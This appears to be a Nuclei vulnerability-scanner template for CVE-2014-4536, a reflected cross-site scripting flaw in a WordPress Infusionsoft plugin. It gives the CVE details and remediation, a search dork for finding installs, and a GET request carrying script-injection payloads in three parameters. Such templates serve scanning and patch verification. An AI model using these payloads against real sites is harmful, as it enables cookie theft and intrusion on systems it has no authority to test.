id: CVE-2014-4536 info: name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - http://wordpress.org/plugins/infusionsoft/changelog - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 epss-percentile: 0.50857 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: katz product: infusionsoft_gravity_forms framework: wordpress google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" matchers-condition: and matchers: - type: word part: body words: - '">' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100afadb85b063fc5088e29cff76b8c9540c1095f90892aaa02a8305319f5b69586022100b4fe62b5d87bedf359bdb3c001d8fb5500b868c7182e929b9fdbd006e174da07:922c64590222798bb761d5b6d8e72950